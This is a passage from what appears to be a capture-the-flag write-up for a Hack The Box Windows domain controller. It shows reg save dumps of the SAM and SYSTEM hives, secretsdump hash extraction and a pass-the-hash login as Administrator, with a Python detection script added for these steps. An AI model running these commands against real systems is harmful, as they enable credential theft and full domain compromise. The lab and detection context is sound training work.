BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
So I dumped the HKLM hives (SAM and SYSTEM) with reg save, and we'll pull the hashes out of them offline.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save HKLM\system system.save
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save HKLM\sam sam.save
The operation completed successfully.
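Backup Operators membership on a domain controller is effectively full compromise, as the hive dump above shows, so both the privileged logon and the reg save itself are worth detecting. The following Python is an added example, not from the write-up: it runs over constructed Security-log records shaped like event 4672 (special privileges assigned to new logon) and 4688 (process creation, which only carries CommandLine when command-line auditing is enabled), and the allowlisted service account is hypothetical. It also matches reg export and the SECURITY hive, which this page does not use.

```python
"""Detection for the privilege-escalation path on this box: a Backup Operators
member (SeBackupPrivilege) dumping the SAM/SYSTEM hives with reg.exe.
Event records are constructed to look like Security-log 4672/4688 exported to JSON."""
import re

# Accounts expected to log on with backup privileges on this host (assumed allowlist).
# On a DC, members of Administrators also trigger 4672, so extend this or join on group membership.
EXPECTED_BACKUP_ACCOUNTS = {"CICADA\\svc_backup"}   # hypothetical service account
# Privileges in a 4672 PrivilegeList that let a non-admin read otherwise protected hives
SENSITIVE_PRIVS = {"SeBackupPrivilege", "SeRestorePrivilege"}
# reg.exe save/export of a credential-bearing hive, with or without a full path, any case
HIVE_DUMP = re.compile(
    r"\breg(?:\.exe)?\s+(?:save|export)\s+(?:hklm|hkey_local_machine)\\(?:sam|system|security)\b", re.I)

# Constructed sample events mirroring the session above
EVENTS = [
    {"EventID": 4672, "Computer": "CICADA-DC.cicada.htb", "SubjectDomainName": "CICADA",
     "SubjectUserName": "emily.oscars", "PrivilegeList": "SeBackupPrivilege\n\t\t\tSeRestorePrivilege"},
    {"EventID": 4672, "Computer": "CICADA-DC.cicada.htb", "SubjectDomainName": "CICADA",
     "SubjectUserName": "svc_backup", "PrivilegeList": "SeBackupPrivilege\n\t\t\tSeRestorePrivilege"},
    {"EventID": 4688, "Computer": "CICADA-DC.cicada.htb", "SubjectDomainName": "CICADA",
     "SubjectUserName": "emily.oscars", "NewProcessName": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg save HKLM\\system system.save"},
    {"EventID": 4688, "Computer": "CICADA-DC.cicada.htb", "SubjectDomainName": "CICADA",
     "SubjectUserName": "emily.oscars", "NewProcessName": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg save HKLM\\sam sam.save"},
    {"EventID": 4688, "Computer": "CICADA-DC.cicada.htb", "SubjectDomainName": "CICADA",
     "SubjectUserName": "emily.oscars", "NewProcessName": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion"},  # benign
]


def account(event: dict) -> str:
    return f"{event['SubjectDomainName']}\\{event['SubjectUserName']}"


def detect(events: list[dict]) -> list[tuple[str, str, str]]:
    """Return (rule, account, detail) alerts for unexpected backup-privilege logons
    and for reg.exe dumps of the SAM, SYSTEM or SECURITY hive."""
    alerts = []
    for ev in events:
        who = account(ev)
        if ev["EventID"] == 4672:
            # PrivilegeList arrives as one whitespace-separated blob in the exported event
            held = set(ev["PrivilegeList"].split()) & SENSITIVE_PRIVS
            if held and who not in EXPECTED_BACKUP_ACCOUNTS:
                alerts.append(("backup-privilege-logon", who, ", ".join(sorted(held))))
        elif ev["EventID"] == 4688 and HIVE_DUMP.search(ev.get("CommandLine", "")):
            alerts.append(("hive-dump", who, ev["CommandLine"]))
    return alerts


def correlate(alerts: list[tuple[str, str, str]]) -> list[str]:
    """Accounts that both logged on with backup privileges and dumped a hive: the
    combination seen on this box, and a much stronger signal than either alert alone."""
    rules_by_account: dict[str, set] = {}
    for rule, who, _ in alerts:
        rules_by_account.setdefault(who, set()).add(rule)
    return sorted(who for who, rules in rules_by_account.items()
                  if {"backup-privilege-logon", "hive-dump"} <= rules)


if __name__ == "__main__":
    found = detect(EVENTS)
    for rule, who, detail in found:
        print(f"[{rule}] {who}: {detail}")
    print("backup operator dumping hives:", correlate(found))
```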
Shell as Administrator
Dumping the hashes locally out of the hives gives us the Administrator's hash.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ secretsdump.py -sam sam.save -system system.save LOCAL
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
And using Pass-the-Hash over WinRM we got root.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/cicada]
└──╼ [★]$ nxc winrm cicada.htb -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341 -X 'type C:\Users\Administrator\Desktop\root.txt'
WINRM 10.129.231.149 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM 10.129.231.149 5985 CICADA-DC [+] cicada.htb\administrator:2b87e7c93a3e8a0ea4a581937016f341 (Pwn3d!)
WINRM 10.129.231.149 5985 CICADA-DC [+] Executed command (shell type: powershell)
WINRM 10.129.231.149 5985 CICADA-DC 65dfceac2e580d05f3e486b0422c7a1c
